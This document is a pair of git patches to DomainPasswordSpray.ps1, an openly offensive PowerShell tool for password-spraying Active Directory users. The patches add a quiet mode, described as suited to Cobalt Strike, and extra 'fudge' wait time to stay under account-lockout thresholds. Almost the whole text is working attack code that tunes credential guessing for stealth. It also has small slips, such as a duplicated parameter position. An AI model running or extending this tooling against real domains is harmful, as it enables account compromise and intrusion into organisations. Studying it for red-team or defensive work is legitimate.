From d5270c1e837475275f87c9cd2f309e856c3b86bb Mon Sep 17 00:00:00 2001 From: Tim Meding Date: Tue, 16 Apr 2019 17:31:32 -0500 Subject: [PATCH 1/2] Add Quiet Option --- DomainPasswordSpray.ps1 | 29 +++++++++++++++++++++++------ 1 file changed, 23 insertions(+), 6 deletions(-) diff --git a/DomainPasswordSpray.ps1 b/DomainPasswordSpray.ps1 index 70d981b..ec8e1a0 100644 --- a/DomainPasswordSpray.ps1 +++ b/DomainPasswordSpray.ps1 @@ -42,6 +42,10 @@ function Invoke-DomainPasswordSpray{ Forces the spray to continue and doesn't prompt for confirmation. + .PARAMETER Quiet + + Less output so it will work better with things like Cobalt Strike + .PARAMETER UsernameAsPassword For each user, will try that user's name as their password @@ -109,7 +113,11 @@ function Invoke-DomainPasswordSpray{ $Delay=0, [Parameter(Position = 9, Mandatory = $false)] - $Jitter=0 + $Jitter=0, + + [Parameter(Position = 10, Mandatory = $false)] + [switch] + $Quiet ) @@ -213,13 +221,13 @@ function Invoke-DomainPasswordSpray{ if($UsernameAsPassword) { - Invoke-SpraySinglePassword -Domain $CurrentDomain -UserListArray $UserListArray -OutFile $OutFile -Delay $Delay -Jitter $Jitter -UsernameAsPassword + Invoke-SpraySinglePassword -Domain $CurrentDomain -UserListArray $UserListArray -OutFile $OutFile -Delay $Delay -Jitter $Jitter -UsernameAsPassword -Quiet $Quiet } else { for($i = 0; $i -lt $Passwords.count; $i++) { - Invoke-SpraySinglePassword -Domain $CurrentDomain -UserListArray $UserListArray -Password $Passwords[$i] -OutFile $OutFile -Delay $Delay -Jitter $Jitter + Invoke-SpraySinglePassword -Domain $CurrentDomain -UserListArray $UserListArray -Password $Passwords[$i] -OutFile $OutFile -Delay $Delay -Jitter $Jitter -Quiet $Quiet if (($i+1) -lt $Passwords.count) { Countdown-Timer -Seconds (60*$observation_window) @@ -497,13 +505,19 @@ function Invoke-SpraySinglePassword $Jitter=0, [Parameter(Position=7)] [switch] - $UsernameAsPassword + $UsernameAsPassword, + [Parameter(Position=7)] + [switch] + $Quiet ) $time = Get-Date $count = $UserListArray.count Write-Host "[*] Now trying password $Password against $count users. Current time is $($time.ToShortTimeString())" $curr_user = 0 - Write-Host -ForegroundColor Yellow "[*] Writing successes to $OutFile" + if ($OutFile -ne ""-and -not $Quiet) + { + Write-Host -ForegroundColor Yellow "[*] Writing successes to $OutFile" + } $RandNo = New-Object System.Random foreach ($User in $UserListArray) @@ -522,7 +536,10 @@ function Invoke-SpraySinglePassword Write-Host -ForegroundColor Green "[*] SUCCESS! User:$User Password:$Password" } $curr_user += 1 - Write-Host -nonewline "$curr_user of $count users tested`r" + if (-not $Quiet) + { + Write-Host -nonewline "$curr_user of $count users tested`r" + } if ($Delay) { Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) From 655d7eb0d6ef40ee469a9a8e730193e75f4149e1 Mon Sep 17 00:00:00 2001 From: Tim Medin Date: Thu, 23 Jul 2020 16:55:14 -0500 Subject: [PATCH 2/2] Add Fudge time. Better quiet mode. --- DomainPasswordSpray.ps1 | 28 +++++++++++++++++++++------- 1 file changed, 21 insertions(+), 7 deletions(-) diff --git a/DomainPasswordSpray.ps1 b/DomainPasswordSpray.ps1 index ec8e1a0..1ad6e1b 100644 --- a/DomainPasswordSpray.ps1 +++ b/DomainPasswordSpray.ps1 @@ -42,6 +42,10 @@ function Invoke-DomainPasswordSpray{ Forces the spray to continue and doesn't prompt for confirmation. + .PARAMETER Fudge + + Extra wait time between each round of tests (seconds). + .PARAMETER Quiet Less output so it will work better with things like Cobalt Strike @@ -117,8 +121,11 @@ function Invoke-DomainPasswordSpray{ [Parameter(Position = 10, Mandatory = $false)] [switch] - $Quiet + $Quiet, + [Parameter(Position = 11, Mandatory = $false)] + [int] + $Fudge=10 ) if ($Password) @@ -230,7 +237,7 @@ function Invoke-DomainPasswordSpray{ Invoke-SpraySinglePassword -Domain $CurrentDomain -UserListArray $UserListArray -Password $Passwords[$i] -OutFile $OutFile -Delay $Delay -Jitter $Jitter -Quiet $Quiet if (($i+1) -lt $Passwords.count) { - Countdown-Timer -Seconds (60*$observation_window) + Countdown-Timer -Seconds (60*$observation_window + $Fudge) -Quiet $Quiet } } } @@ -246,14 +253,21 @@ function Countdown-Timer { param( $Seconds = 1800, - $Message = "[*] Pausing to avoid account lockout." + $Message = "[*] Pausing to avoid account lockout.", + [switch] $Quiet = $False ) - foreach ($Count in (1..$Seconds)) + if ($quiet) { - Write-Progress -Id 1 -Activity $Message -Status "Waiting for $($Seconds/60) minutes. $($Seconds - $Count) seconds remaining" -PercentComplete (($Count / $Seconds) * 100) - Start-Sleep -Seconds 1 + Write-Host "$Message: Waiting for $($Seconds/60) minutes. $($Seconds - $Count)" + Start-Sleep -Seconds $Seconds + } else { + foreach ($Count in (1..$Seconds)) + { + Write-Progress -Id 1 -Activity $Message -Status "Waiting for $($Seconds/60) minutes. $($Seconds - $Count) seconds remaining" -PercentComplete (($Count / $Seconds) * 100) + Start-Sleep -Seconds 1 + } + Write-Progress -Id 1 -Activity $Message -Status "Completed" -PercentComplete 100 -Completed } - Write-Progress -Id 1 -Activity $Message -Status "Completed" -PercentComplete 100 -Completed } function Get-DomainUserList